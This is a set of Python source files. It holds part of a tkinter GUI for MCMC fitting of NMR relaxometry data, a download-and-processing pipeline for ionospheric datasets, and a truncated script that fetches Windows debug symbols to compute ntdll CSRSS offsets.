self.maxOthers.append(tk.IntVar()) self.maxOthers[-1].set("") self.MaxOthers.append(tk.Entry(self.param, textvariable = self.maxOthers[-1], width=10)) OthersText.grid(row=7+i, column=6) self.MinOthers[i].grid(row=7+i, column=7) self.MaxOthers[i].grid(row=7+i, column=8) incr = max(len(self.OP), len(self.CT), len(self.Others)) self.nline = 6 + incr #Load files part TextFiles = tk.Label(self.param, text = "Load files:", fg="blue") self.FieldCal = tk.Button(self.param, text="Field calibration file", command = lambda: BrowseFieldCal(self)) self.ExpSetUp = tk.Button(self.param, text="Experimental setup file", command = lambda: BrowseExpSetUp(self)) self.Irelaxom = tk.Button(self.param, text="Relaxometry Intensity folder", command = lambda: BrowseRelaxomInt(self)) self.Input = tk.Button(self.param, text="Other inputs file", command = lambda: BrowseInputs(self)) self.RelaxationDataSet = [] self.Nlabel = 1 self.RelaxationDataSet.append(tk.Button(self.param, text="High field rates", command = lambda: BrowseRates(self, ([0])))) self.MenuRelaxType = {} for i in range(len(ParamFile.RelaxationRates)): self.MenuRelaxType[str(ParamFile.RelaxationRates[i])] = i+1 self.RelaxationDataType = [] self.RelaxationType = [] self.RelaxationDataType.append(tk.StringVar()) self.RelaxationDataType[-1].set("Data type") self.RelaxationType.append(tk.OptionMenu(self.param, self.RelaxationDataType[-1], *self.MenuRelaxType.keys())) self.Fields = [] Field = tk.StringVar() Field.set("High field (T)") self.Fields.append(tk.Entry(self.param, textvariable = Field, width=10)) self.AddButton = tk.Button(self.param, text="Add high field rates", command = lambda: Add(self)) TextFiles.grid(row=self.nline+1, column=0) self.FieldCal.grid(row=self.nline+2, column=0, columnspan=2) self.ExpSetUp.grid(row=self.nline+2, column=2) self.Irelaxom.grid(row=self.nline+3, column=0, columnspan=2) self.Input.grid(row=self.nline+3, column=2) for i in range(len(self.RelaxationDataSet)): self.RelaxationDataSet[i].grid(row=self.nline+4+i, column=0, columnspan=2) self.RelaxationType[i].grid(row=self.nline+4+i, column=2) self.Fields[i].grid(row=self.nline+4+i, column=3) #PDB ID TextPDB = tk.Label(self.param, text = "4-letter PDB ID (if available):", fg = "blue") self.PDBID = tk.IntVar() self.PDBID.set("") self.PDBid = tk.Entry(self.param, textvariable = self.PDBID, width=10) TextPDB.grid(row=self.nline+1, column=6, columnspan=2) self.PDBid.grid(row=self.nline+2, column=6, columnspan=2) def GetData(self): GUI.begin = time.strftime("%H") + "H" + time.strftime("%M") #################################################### Create the results folder and copy the input files in it #################################################### workingDirectiory = os.path.dirname(os.path.abspath(__file__)) ResultDirectory = workingDirectiory + "/Results" if not os.path.exists(ResultDirectory): os.makedirs(ResultDirectory) GUI.directoryName = ResultDirectory + "/" + time.strftime("%Y-%m-%d") t = 0 n = 2 while t == 0: if not os.path.exists(GUI.directoryName): os.makedirs(GUI.directoryName) t = 1 else: GUI.directoryName = ResultDirectory + "/" + time.strftime("%Y-%m-%d") + "_" + str(n) n += 1 dirInput = GUI.directoryName + "/InputFiles" os.makedirs(dirInput) dirOutput = GUI.directoryName + "/FitAllResidues" os.makedirs(dirOutput) dirFitOutput = GUI.directoryName + "/FittingResults" os.makedirs(dirFitOutput) #Copy the directory functions fromDirectory = sys.argv[1] toDirectory = dirInput + "/ExpressionsAndConstraints" os.makedirs(toDirectory) copy_tree(fromDirectory, toDirectory) #Copy the input files ExperimentalSetUpPath = self.ExperimentalSetUp FieldCalibrationPath = self.FieldCalibration GUI.InputPath = self.InputFile dirHFRelax = dirInput + "/HFRelaxationRates" os.makedirs(dirHFRelax) for i in range(len(ParamFile.RelaxationRates)): os.makedirs(dirHFRelax + "/" + ParamFile.RelaxationRates[i]) os.makedirs(dirOutput + "/" + ParamFile.RelaxationRates[i]) for i in range(len(self.RATES)): RelaxFilePath = self.RATES[i] destFile = dirHFRelax + "/" + str(self.RelaxationDataType[i].get()) + "/" + str(os.path.basename(self.RATES[i])) copyfile(RelaxFilePath, destFile) FileNames = ["/ExpSetUp.txt", "/FieldCalibration.txt", "/OtherInputs.txt"] n = 0 for i in [ExperimentalSetUpPath, FieldCalibrationPath, GUI.InputPath]: destFile = dirInput + FileNames[n] copyfile(i, destFile) n+=1 #################################################### Read the data #################################################### GUI.Nmcmc = int(self.Nmcmc.get()) Nwalker_b = int(self.Nwalker.get()) GUI.Nwalker = MCMC.nWalkerCheck(Nwalker_b, len(ParamFile.Names['OrderParam']) + len(ParamFile.Names['CorrTimes'])+len(ParamFile.Names['others'])+1) GUI.TauC = float(self.TauC.get()) GUI.OP = self.OP GUI.CT = self.CT GUI.Others = self.Others GUI.TotParam = [] for i in self.OP: GUI.TotParam.append(i) for i in self.CT: GUI.TotParam.append(i) for i in self.Others: GUI.TotParam.append(i) GUI.AccelerationType = str(self.AccelerationTYPE.get()) GUI.PDB = self.PDBid.get() if len(GUI.PDB) == 4: GUI.checkPDB = True else: GUI.checkPDB = False ExperimentalSetUp = open(ExperimentalSetUpPath, "r") #this is a file containing the experiment number, the height (LF value), d22 (stab LF), d25 (stab HF), WTHF (response time), shuttle LF (time of shuttling to LF), WTLF, shuttle HF and VC (time spent at LF) FieldCalibration = open(FieldCalibrationPath, "r") #This is a file containing the height and the corresponding field with FieldCalibration as input: FC = list(zip(*(line.strip().split("\t") for line in input))) FC = [[float(FC[col][line]) for col in range(2)] for line in range(len(FC[0]))] #it is a one column vector containing the height and the field at each position heights = [FC[col][0] for col in range(len(FC))] fields = [FC[col][1] for col in range(len(FC))] higherHeights = [] lowerHeights = [] middleHeights = [] middleFields = [] higherFields = [] lowerFields = [] for i in range(len(heights)): if heights[i] <= 0.47: higherHeights.append(heights[i]) higherFields.append(fields[i]) else: if heights[i] <= 0.6: middleHeights.append(heights[i]) middleFields.append(fields[i]) else: lowerHeights.append(heights[i]) lowerFields.append(fields[i]) GUI.HigherCoefs = np.polyfit(higherHeights, higherFields, 10) GUI.MiddleCoefs = np.polyfit(middleHeights, middleFields, 5) GUI.LowerCoefs = np.polyfit(lowerHeights, lowerFields, 10) #BO Files HFfiles = [] HFtypes = [] AllFields = [] for i in range(len(self.RelaxationDataSet)): HFfiles.append(self.RATES[i]) HFtypes.append(str(self.RelaxationDataType[i].get())) AllFields.append(float(self.Fields[i].get())) UsedFields = [] for i in AllFields: if i not in UsedFields: UsedFields.append(i) GUI.B0HFields_int = [] targetLength = len(UsedFields) while len(GUI.B0HFields_int) != targetLength: GUI.B0HFields_int.append(max(UsedFields)) UsedFields.remove(max(UsedFields)) numberExp = sum(1 for line in ExperimentalSetUp) ExperimentalSetUp.close() ExperimentalSetUp = open(ExperimentalSetUpPath, "r") GUI.ExperimentNumber = [[] for i in range(numberExp)] GUI.Height = [[] for i in range(numberExp)] GUI.d22 = [[] for i in range(numberExp)] GUI.d25 = [[] for i in range(numberExp)] GUI.WTHF = [[] for i in range(numberExp)] GUI.SLF = [[] for i in range(numberExp)] GUI.WTLF = [[] for i in range(numberExp)] GUI.SHF = [[] for i in range(numberExp)] GUI.VC = [[] for i in range(numberExp)] for i in range(numberExp): Line = ExperimentalSetUp.readline() Line = [x for x in Line.split('\n')] Line = Line[0] Line = [x for x in Line.split('\t')] Line = [float(col) for col in Line] GUI.ExperimentNumber[i] = int(Line[0]) GUI.Height[i] = Line[1] GUI.d22[i] = Line[2] * 1e-3 GUI.d25[i] = Line[3] * 1e-3 GUI.WTHF[i] = Line[4] * 1e-3 GUI.SLF[i] = Line[5] * 1e-3 GUI.WTLF[i] = Line[6] * 1e-3 GUI.SHF[i] = Line[7] * 1e-3 vc = [] for j in range(len(Line)-8): vc.append(Line[j+8] * 1e-3) GUI.VC[i] = vc GUI.B0LFields_Int = [[] for i in range(numberExp)] for i in range(len(GUI.Height)): GUI.B0LFields_Int[i] = FitF.B0Fit(GUI.Height[i], GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs) GUI.MagField = FitF.B0Fit(0.0, GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs) #Plot the field profile with the considered fields during relaxometry FigOut.PlotFieldProfile(heights, GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs, GUI.B0LFields_Int, fields, dirFitOutput) #HF Relaxation rates Files HFfiles_orga = [[[] for j in GUI.B0HFields_int] for i in ParamFile.RelaxationRates] HFields_orga = [[[] for j in GUI.B0HFields_int] for i in ParamFile.RelaxationRates] for i in range(len(HFfiles)): posType = ParamFile.RelaxationRates.index(HFtypes[i]) posField = GUI.B0HFields_int.index(AllFields[i]) HFfiles_orga[posType][posField].append(HFfiles[i]) HFields_orga[posType][posField].append(AllFields[i]) #Amino Acids number list nAA = sum(1 for line in open(HFfiles[0])) GUI.AAList = [] for line in open(HFfiles[0]): line = line.split("\n") line = line[0] line = line.split("\t") GUI.AAList.append(int(line[0])) #create the average HFdata list GUI.HFdata = [[[] for i in ParamFile.RelaxationRates] for k in GUI.AAList] GUI.B0HFields = [[[] for i in ParamFile.RelaxationRates] for k in GUI.AAList] for RelaxType in range(len(ParamFile.RelaxationRates)): for HField in range(len(HFfiles_orga[RelaxType])): ndata = [0.0 for i in range(nAA)] for i in range(len(HFfiles_orga[RelaxType][HField])): file = open(HFfiles_orga[RelaxType][HField][i], 'r') with file as input: Filedata = list(zip(*(line.strip().split("\t") for line in input))) for AA in range(nAA): if Filedata[1][AA] != 'NA': ndata[AA] += 1.0 if i == 0: GUI.HFdata[AA][RelaxType].append([int(Filedata[0][AA]), float(Filedata[1][AA]), float(Filedata[2][AA])]) GUI.B0HFields[AA][RelaxType].append(float(HFields_orga[RelaxType][HField][0])) else: GUI.HFdata[AA][RelaxType][-1][1] = float(GUI.HFdata[AA][RelaxType][-1][1]) + float(Filedata[1][AA]) GUI.HFdata[AA][RelaxType][-1][2] = float(GUI.HFdata[AA][RelaxType][-1][2]) + float(Filedata[2][AA]) file.close() for AA in range(nAA): if ndata[AA] != 0.0: GUI.HFdata[AA][RelaxType][-1][1] = float(GUI.HFdata[AA][RelaxType][-1][1])/ndata[AA] GUI.HFdata[AA][RelaxType][-1][2] = float(GUI.HFdata[AA][RelaxType][-1][2])/ndata[AA] #LF intensities dirIntRelax = dirInput + "/RelaxometryIntensities" os.makedirs(dirIntRelax) GUI.Intensities = [[] for AA in GUI.AAList] GUI.B0LFields = [[] for AA in GUI.AAList] for n in range(len(GUI.ExperimentNumber)): InterensityFile = self.Intrelax + "/" + str(int(GUI.ExperimentNumber[n])) + ".txt" if os.path.isfile(InterensityFile): destFile = dirIntRelax + "/" + str(int(GUI.ExperimentNumber[n])) + ".txt" copyfile(InterensityFile, destFile) AA = 0 for line in open(InterensityFile): L = line.split("\n") L = L[0] L = L.split("\t") if int(2*len(GUI.VC[n])+1) != len(L): print("") print("Eperiment number " + str(int(GUI.ExperimentNumber[n])) + " does not have the correct number of intensities") print("") sys.exit() else: ToAdd = [] for vc in range(int((len(L)-1)/2)): if L[vc*2+1] != "NA": ToAdd.append([int(L[0]), float(L[vc*2+1]), float(L[vc*2+2])]) else: ToAdd.append([int(L[0]), "NA", "NA"]) if len(ToAdd) != 0: GUI.B0LFields[AA].append(FitF.B0Fit(GUI.Height[n], GUI.LowerCoefs, GUI.MiddleCoefs, GUI.HigherCoefs)) GUI.Intensities[AA].append(ToAdd) AA += 1 else: print("") print("Missing the eperiment number " + str(int(GUI.ExperimentNumber[n])) + " file") print("") sys.exit() #Other inputs InputF = open(GUI.InputPath, "r") with InputF as input: inputL = list(zip(*(line.strip().split('\t') for line in input))) GUI.OtherInputs = [[] for AA in GUI.AAList] for AA in range(len(GUI.AAList)): listOtherInputs = [] for i in range(len(inputL)-1): listOtherInputs.append(float(inputL[1+i][AA])) GUI.OtherInputs[AA] = [float(inputL[0][AA]), listOtherInputs] #Write the Parameters file loadFile = dirInput + "/Parameters.txt" GUI.bnds = Out.writeParam(self, loadFile, GUI.TauC, GUI.AccelerationType, GUI.Nmcmc, GUI.Nwalker, GUI.checkPDB, GUI.PDB, ExperimentalSetUpPath, FieldCalibrationPath, self.Intrelax, GUI.InputPath) self.PositionR1 = 0 for i in range(len(self.RelaxFunc)): if ParamFile.RelaxationRates[i] != "R1": self.PositionR1 += 1 break GUI.PositionR1 = self.PositionR1 GUI.RelaxFunc = self.RelaxFunc Calculations() class Calculations(GUI): def __init__(self): self.FieldLists() def FieldLists(self): #################################################### Preparation before MCMC #################################################### print("") print("Optimizing shuttling time increment...") self.LFtimes = [[self.d22[wtlf] + self.WTLF[wtlf] + self.VC[wtlf][vc] for vc in range(len(self.VC[wtlf]))] for wtlf in range(len(self.WTLF))] posLowField = self.B0LFields[0].index(min(self.B0LFields[0])) RandomParam = [[] for i in range(10)] for i in range(10): for P in range(len(self.TotParam)): RandomParam[i].append(uniform(self.bnds[P][0], self.bnds[P][1])) self.Increment = ShSim.optShuttling(self, posLowField, np.array(RandomParam), ParamFile.PositionAuto) self.FieldListUp, self.FieldListDown = ShSim.FieldList(self, self.Increment) print("Final used increment: ", self.Increment, " s") print("") print("Choosing propagator calculation method...") refRM = np.asarray(_RelaxMat.RelaxMat(5.0, RandomParam[0], self.TauC, self.OtherInputs[0][1])[0]) print(" Method 1") start = time.time() for i in range(10000): linalg.expm(-refRM) end = time.time() Duration1 = end-start print(" time for 10,000 iterations: ", round(Duration1, 1), " s") print(" Method 2") start = time.time() for i in range(10000): eig, eigvec = np.linalg.eig(refRM) eigvec @ np.diag(np.exp(-eig)) @ np.linalg.inv(eigvec) end = time.time() Duration2 = end-start print(" time for 10,000 iterations: ", round(Duration2, 1), " s") if min(Duration1, Duration2) == Duration1: self.PropFunction = ShSim.PropCalExp print("Choosing calculation method done. Method 1 chosen.") else: self.PropFunction = ShSim.PropCalDiag print("Choosing calculation method done. Method 2 chosen.") self.MCMCcalculations() def MCMCcalculations(self): FigMCMCcorrFolder = self.directoryName + "/FittingResults/Correlations" FigMCMCtrajFolder = self.directoryName + "/FittingResults/Trajectories" FigIntensities = self.directoryName + "/FittingResults/Intensities" os.makedirs(FigMCMCcorrFolder) os.makedirs(FigMCMCtrajFolder) os.makedirs(FigIntensities) self.MCMCparam = [[] for AA in self.AAList] self.Acceptance = [[] for AA in self.AAList] self.FinalSimulatedIntensities = [[] for AA in self.AAList] self.R1LFDataForCurve_BackCalc = [[] for i in self.AAList] self.R1LFDataForCurve_Fitted = [[] for i in self.AAList] self.ScalingIntensities = [[] for i in self.AAList] nParam = len(ParamFile.Names['OrderParam']) + len(ParamFile.Names['CorrTimes'])+len(ParamFile.Names['others'])+1 print("") print("Monte Carlo") for AA in range(len(self.AAList)): print("") print(" Residue ", self.AAList[AA]) print("") self.MCMCparam[AA], self.Acceptance[AA], FullTraj = MCMC.MarkovChainMonteCarlo(FigMCMCcorrFolder, FigMCMCtrajFolder, self.Intensities[AA], self.HFdata[AA], self.B0HFields[AA], self.TauC, self.OtherInputs[AA][1], self.MagField, self.Increment, self.FieldListUp, self.FieldListDown, self.ExperimentNumber, self.WTHF, self.d25, self.LFtimes, self.B0LFields[AA], self.Nwalker, self.Nmcmc, self.bnds, self.TotParam, self.AAList[AA], self.PropFunction, nParam) self.FinalSimulatedIntensities[AA] = self.PropFunction(np.array(self.MCMCparam[AA][0][:-1]), self.TauC, np.array(self.OtherInputs[AA][1]), self.MagField, self.Increment, self.FieldListUp, self.FieldListDown, self.ExperimentNumber, self.WTHF, self.d25, self.LFtimes, self.B0LFields[AA], ParamFile.PositionAuto) Out.WriteMCMCTraj(self, FullTraj, self.AAList[AA]) #file containing the MCMC trajectories print("") print(" Making figures") print("") #Draw the intensities self.ScalingIntensities[AA] = MCMC.ScalingFactor(self.FinalSimulatedIntensities[AA], self.Intensities[AA]) timeForSim = [np.linspace(min(self.LFtimes[LField])-min(self.VC[LField]), max(self.LFtimes[LField]), 100) for LField in range(len(self.VC))] timeForSim_Plot = [np.linspace(0.0, max(self.VC[LField]), 100) for LField in range(len(self.VC))] FinalSimulatedIntensitiesFull = self.PropFunction(np.array(self.MCMCparam[AA][0][:-1]), self.TauC, np.array(self.OtherInputs[AA][1]), self.MagField, self.Increment, self.FieldListUp, self.FieldListDown, self.ExperimentNumber, self.WTHF, self.d25, timeForSim, self.B0LFields[AA], ParamFile.PositionAuto) BackIntensities = [[self.ScalingIntensities[AA][LField]*FinalSimulatedIntensitiesFull[LField][t] for t in range(len(FinalSimulatedIntensitiesFull[LField]))] for LField in range(len(self.B0LFields[AA]))] IntensitiesFigFolder = FigIntensities + "/Residue" + str(self.AAList[AA]) os.makedirs(IntensitiesFigFolder) IntensitiesForPlot = [[] for LF in range(len(self.Intensities[AA]))] IntensitiesErrForPlot = [[] for LF in range(len(self.Intensities[AA]))] DelaysForPlot = [[] for LF in range(len(self.Intensities[AA]))] for LF in range(len(self.Intensities[AA])): for VC in range(len(self.Intensities[AA][LF])): if self.Intensities[AA][LF][VC][1] != "NA": IntensitiesForPlot[LF].append(self.Intensities[AA][LF][VC][1]) IntensitiesErrForPlot[LF].append(self.Intensities[AA][LF][VC][2]) DelaysForPlot[LF].append(self.VC[LF][VC]) FigOut.PlotIntensities(self, BackIntensities, IntensitiesFigFolder, IntensitiesForPlot, IntensitiesErrForPlot, DelaysForPlot, timeForSim_Plot, AA) #Draw the relaxation rates for LField in range(len(self.B0LFields[AA])): self.R1LFDataForCurve_BackCalc[AA].append(self.RelaxFunc[self.PositionR1](self.B0LFields[AA][LField], self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0]) ParamOpt, ParamCov = curve_fit(FitF.exp, np.asarray(self.VC[LField]), np.asarray(self.Intensities[AA][LField])[:,1]) self.R1LFDataForCurve_Fitted[AA].append([self.B0LFields[AA][LField], ParamOpt[0]]) yRateMesHF = [[] for i in ParamFile.RelaxationRates] yRateErrMesHF = [[] for i in ParamFile.RelaxationRates] ResiHF = [[] for i in ParamFile.RelaxationRates] xB0HF = [[] for i in ParamFile.RelaxationRates] for RelaxRate in range(len(ParamFile.RelaxationRates)): for HField in range(len(self.B0HFields[AA][RelaxRate])): yRateMesHF[RelaxRate].append(self.HFdata[AA][RelaxRate][HField][1]) yRateErrMesHF[RelaxRate].append(self.HFdata[AA][RelaxRate][HField][2]) xB0HF[RelaxRate].append(self.B0HFields[AA][RelaxRate][HField]) ResiHF[RelaxRate].append(self.HFdata[AA][RelaxRate][HField][1] - self.RelaxFunc[RelaxRate](self.B0HFields[AA][RelaxRate][HField], self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0]) minLF = min(self.B0LFields[AA]) maxHF = 25.0 xFields = np.logspace(np.log(minLF)/np.log(10.), np.log(maxHF)/np.log(10.), 100) xFieldsHF = np.linspace(8., maxHF, 100) for RelaxRate in range(len(ParamFile.RelaxationRates)): if RelaxRate == self.PositionR1: yback = [self.RelaxFunc[self.PositionR1](B0, self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0] for B0 in xFields] FigOut.PlotR1(self, xB0HF[self.PositionR1], ResiHF[self.PositionR1], yRateMesHF[self.PositionR1], yRateErrMesHF[self.PositionR1], yback, xFields, AA) else: yback = [self.RelaxFunc[RelaxRate](B0, self.MCMCparam[AA][0][:-1], self.TauC, self.OtherInputs[AA][1])[0] for B0 in xFieldsHF] FigOut.PlotRate(self, xB0HF[RelaxRate], ResiHF[RelaxRate], yRateMesHF[RelaxRate], yRateErrMesHF[RelaxRate], ParamFile.RelaxationRates[RelaxRate], yback, xFieldsHF, AA) print("") self.WriteResult() def WriteResult(self): LAAList = len(self.AAList) print("") print("Writing final results...") #Put together figures already done F = self.directoryName + "/FittingResults" if len(self.AAList) > 1: FigOut.Convert(F + "/Correlations", "AllCorrelations.pdf", "png", False) FigOut.Convert(F + "/Trajectories", "AllTrajectories.pdf", "png", False) for AA in range(len(self.AAList)): F1 = F + "/Intensities/Residue" + str(self.AAList[AA]) FigOut.Convert(F1, "AllDecays_Residue" + str(self.AAList[AA]) + ".pdf", "png", True) dirFigs = self.directoryName + "/PlotParameters" os.makedirs(dirFigs) Out.WriteMCMCParam(self) #file containing the parameters of the spectral density function extracted from the MCCM #Draw the Chi2 AllChi2 = [[] for i in self.AAList] for AA in range(LAAList): AllChi2[AA] = FitF.Chi2TOT(self.MCMCparam[AA][0][:-1], self.FinalSimulatedIntensities[AA], self.Intensities[AA], self.HFdata[AA], self.B0HFields[AA], self.TauC, self.OtherInputs[AA][1]) FigOut.PlotChi2(dirFigs, AllChi2, self.AAList) #Draw the spetral density function parameters for param in range(len(self.TotParam)): paramForPlot = [self.MCMCparam[AA][0][param] for AA in range(len(self.AAList))] ErrForPlot = [(self.MCMCparam[AA][1][param]+self.MCMCparam[AA][2][param])/2.0 for AA in range(len(self.AAList))] FigOut.PlotDynParam(dirFigs, paramForPlot, ErrForPlot, self.TotParam[param], self.AAList) #Write the LF R1 Out.WriteLFR1(self) #file containing the scaling factors for intensities, back-calculated and fitted low field R1 if len(self.AAList) > 1: F = self.directoryName + "/FitAllResidues/" for Rate in range(len(ParamFile.RelaxationRates)): F1 = F + str(ParamFile.RelaxationRates[Rate]) FigOut.Convert(F1, "All" + str(ParamFile.RelaxationRates[Rate]) + ".pdf", "png", True) #Write the PDB files if self.checkPDB: Out.WritePDB(self, AllChi2) print(" Writing results: Done") print("") end = time.strftime("%H") + "H" + time.strftime("%M") print("Started at: " + self.begin) print("Ended at: " + end) sys.exit(0) if __name__ == "__main__": root = tk.Tk() GUI(root) root.mainloop()
import logging from pathlib import Path from datetime import datetime, timedelta from trough import config from trough import _download, _tec, _arb, _omni, _trough logger = logging.getLogger(__name__) def download_tec(start_date, end_date): user_data = [config.madrigal_user_name, config.madrigal_user_email, config.madrigal_user_affil] logger.info(f"running 'download_tec', start date: {start_date}, end date: {end_date}, user data: {user_data}") downloader = _download.MadrigalTecDownloader(config.download_tec_dir, *user_data) downloader.download(start_date, end_date) logger.info("'download_tec' completed") def download_arb(start_date, end_date): logger.info(f"running 'download_arb', start date: {start_date}, end date: {end_date}") downloader = _download.ArbDownloader(config.download_arb_dir) downloader.download(start_date, end_date) logger.info("'download_arb' completed") def download_omni(start_date, end_date): logger.info(f"running 'download_omni', start date: {start_date}, end date: {end_date}") downloader = _download.OmniDownloader(config.download_omni_dir, config.nasa_spdf_download_method) downloader.download(start_date, end_date) logger.info("'download_omni' completed") def download_all(start_date, end_date): download_tec(start_date, end_date) download_arb(start_date, end_date) download_omni(start_date, end_date) def process_tec(start_date, end_date): logger.info("running 'process_tec'") _tec.process_tec_dataset(start_date, end_date) if not config.keep_download: for path in Path(config.download_tec_dir).glob("*.hdf5"): date = _tec.parse_madrigal_fn(path) if start_date <= date <= end_date: path.unlink() def process_arb(start_date, end_date): logger.info("running 'process_arb'") _arb.process_auroral_boundary_dataset(start_date, end_date) if not config.keep_download: for path in Path(config.download_arb_dir).glob("*.NC"): sat_name, date = _arb.parse_arb_fn(path) if start_date <= date <= end_date: path.unlink() def process_omni(start_date, end_date): logger.info("running 'process_omni'") _omni.process_omni_dataset(config.download_omni_dir, Path(config.processed_omni_file)) def process_all(start_date, end_date): logger.info("running 'process_all'") process_tec(start_date, end_date) process_arb(start_date, end_date) process_omni(start_date, end_date) def label_trough(start_date, end_date): logger.info("running 'label_trough'") _trough.label_trough_dataset(start_date, end_date) def full_run(start_date, end_date): logger.info("running 'full_run'") for year in range(start_date.year, end_date.year + 1): start = max(start_date, datetime(year, 1, 1)) end = min(end_date, datetime(year + 1, 1, 1)) if end - start <= timedelta(hours=1): continue download_tec(start, end) process_tec(start, end) download_arb(start, end) process_arb(start, end) download_omni(start_date, end_date) process_omni(start_date, end_date) label_trough(start_date, end_date)
<reponame>khang06/winnie<filename>forklib/gen_csrss_offsets.py # This tool generates csrss_offsets.py by downloading and # parsing symbols from the Microsoft symbol server. # Requirements: construct, pefile # Run with python2, NOT PYTHON3! import sys, os if not (sys.maxsize > 2**32) and os.name == 'nt': print('Sorry, 32-bit python is not supported because of WOW64 redirection. Please use 64-bit python') raise ValueError('Unsupported python version') if sys.version_info >= (3, 0): print("Sorry, python3 isn't supported") raise ValueError('Unsupported python version') import os.path from pefile import PE from shutil import copyfileobj from pdbparse.peinfo import * try: from urllib.parse import urlparse, urlencode from urllib.request import urlopen, Request, build_opener, FancyURLopener from urllib.error import HTTPError except ImportError: from urlparse import urlparse from urllib import urlencode from urllib2 import urlopen, Request, HTTPError, build_opener from urllib import FancyURLopener #SYM_URL = 'http://symbols.mozilla.org/firefox' SYM_URLS = ['http://msdl.microsoft.com/download/symbols'] USER_AGENT = "Microsoft-Symbol-Server/6.11.0001.404" class PDBOpener(FancyURLopener): version = USER_AGENT def http_error_default(self, url, fp, errcode, errmsg, headers): if errcode == 404: raise HTTPError(url, errcode, errmsg, headers, fp) else: FancyURLopener.http_error_default(url, fp, errcode, errmsg, headers) lastprog = None def progress(blocks, blocksz, totalsz): global lastprog if lastprog is None: sys.stderr.write("Connected. Downloading data..." + "\n") percent = int((100 * (blocks * blocksz) / float(totalsz))) if lastprog != percent and percent % 5 == 0: sys.stderr.write("%d%%" % percent + "\n") lastprog = percent sys.stdout.flush() def download_file(guid, fname, path = None, quiet = False): if path is None: import tempfile path = tempfile.gettempdir() outfile = os.path.join(path, fname) if os.path.isfile(outfile): sys.stderr.write(outfile + ' already exists\n') return outfile ''' Download the symbols specified by guid and filename. Note that 'guid' must be the GUID from the executable with the dashes removed *AND* the Age field appended. The resulting file will be saved to the path argument, which default to the current directory. ''' # A normal GUID is 32 bytes. With the age field appended # the GUID argument should therefore be longer to be valid. # Exception: old-style PEs without a debug section use # TimeDateStamp+SizeOfImage if len(guid) == 32: sys.stderr.write("Warning: GUID is too short to be valid. Did you append the Age field?" + "\n") for sym_url in SYM_URLS: url = sym_url + "/%s/%s/" % (fname, guid) opener = build_opener() # Whatever extension the user has supplied it must be replaced with .pd_ tries = [fname[:-1] + '_', fname] for t in tries: if not quiet: sys.stderr.write("Trying %s" % (url + t) + "\n") outfile = os.path.join(path, t) try: hook = None if quiet else progress PDBOpener().retrieve(url + t, outfile, reporthook = hook) if not quiet: sys.stderr.write("\n") sys.stderr.write("Saved symbols to %s" % (outfile) + "\n") return outfile except HTTPError as e: if not quiet: sys.stderr.write("HTTP error %u" % (e.code) + "\n") return None def handle_pe(pe_file): dbgdata, tp = get_pe_debug_data(pe_file) if tp == "IMAGE_DEBUG_TYPE_CODEVIEW": # XP+ if dbgdata[:4] == b"RSDS": (guid, filename) = get_rsds(dbgdata) elif dbgdata[:4] == b"NB10": (guid, filename) = get_nb10(dbgdata) else: sys.stderr.write("ERR: CodeView section not NB10 or RSDS" + "\n") return guid = guid.upper() saved_file = download_file(guid, filename) elif tp == "IMAGE_DEBUG_TYPE_MISC": # Win2k # Get the .dbg file guid = get_pe_guid(pe_file) guid = guid.upper() filename = get_dbg_fname(dbgdata) saved_file = download_file(guid, filename) # Extract it if it's compressed # Note: requires cabextract! if saved_file.endswith("_"): os.system("cabextract %s" % saved_file) saved_file = saved_file.replace('.db_', '.dbg') from pdbparse.dbgold import DbgFile dbgfile = DbgFile.parse_stream(open(saved_file, 'rb')) cv_entry = [d for d in dbgfile.IMAGE_DEBUG_DIRECTORY if d.Type == "IMAGE_DEBUG_TYPE_CODEVIEW"][0] if cv_entry.Data[:4] == b"NB09": return elif cv_entry.Data[:4] == b"NB10": (guid, filename) = get_nb10(cv_entry.Data) guid = guid.upper() saved_file = download_file(guid, filename) else: sys.stderr.write("WARN: DBG file received from symbol server has unknown CodeView section" + "\n") return else: sys.stderr.write("Unknown type:", tp + "\n") return if saved_file != None and saved_file.endswith("_"): os.system("cabextract %s" % saved_file) return saved_file def get_pe_from_pe(filename, symname = None): guid = get_pe_guid(filename) if symname is None: symname = os.path.basename(filename) saved_file = download_file(guid, symname) if saved_file and saved_file.endswith("_"): os.system("cabextract %s" % saved_file) """ These fields need to be zeroed: System32/ntdll.dll .data:00000001801798A8 CsrServerApiRoutine dq ? ; DATA XREF: RtlRegisterThreadWithCsrss+46 .data:00000001801798A8 ; RtlRegisterThreadWithCsrss+93 ... .data:00000001801798B0 CsrClientProcess db ? ; DATA XREF: RtlRegisterThreadWithCsrss+1B .data:00000001801798B0 ; CsrClientConnectToServer+89 ... .data:00000001801798B1 CsrInitOnceDone db ? ; DATA XREF: RtlRegisterThreadWithCsrss:loc_180014D6E .data:00000001801798B1 ; CsrClientConnectToServer:loc_180078AF3 ... .data:00000001801798B2 align 20h .data:00000001801798C0 CsrPortName dw ? ; DATA XREF: CsrpConnectToServer+103 .data:00000001801798C0 ; CsrpConnectToServer+10A ... .data:00000001801798C2 word_1801798C2 dw ? ; DATA XREF: CsrpConnectToServer+7D .data:00000001801798C4 align 8 .data:00000001801798C8 qword_1801798C8 dq ? ; DATA XREF: CsrpConnectToServer+8A .data:00000001801798C8 ; CsrpConnectToServer+F1 ... .data:00000001801798D0 CsrProcessId dq ? ; DATA XREF: CsrpConnectToServer+320 .data:00000001801798D0 ; CsrGetProcessId .data:00000001801798D8 CsrReadOnlySharedMemorySize dq ? ; DATA XREF: CsrpConnectToServer+315 .data:00000001801798D8 ; CsrVerifyRegion+20 .data:00000001801798E0 CsrPortMemoryRemoteDelta dq ? ; DATA XREF: CsrpConnectToServer+32F .data:00000001801798E0 ; CsrClientCallServer+80 ... .data:00000001801798E8 ; HANDLE CsrPortHandle .data:00000001801798E8 CsrPortHandle dq ? ; DATA XREF: CsrClientConnectToServer+AF .data:00000001801798E8 ; CsrpConnectToServer+240 ... .data:00000001801798F0 CsrPortHeap dq ? ; DATA XREF: CsrClientConnectToServer+193 .data:00000001801798F0 ; CsrpConnectToServer+378 ... .data:00000001801798F8 CsrPortBaseTag dd ? ; DATA XREF: CsrClientConnectToServer+19F .data:00000001801798F8 ; CsrpConnectToServer+388 ... .data:00000001801798FC align 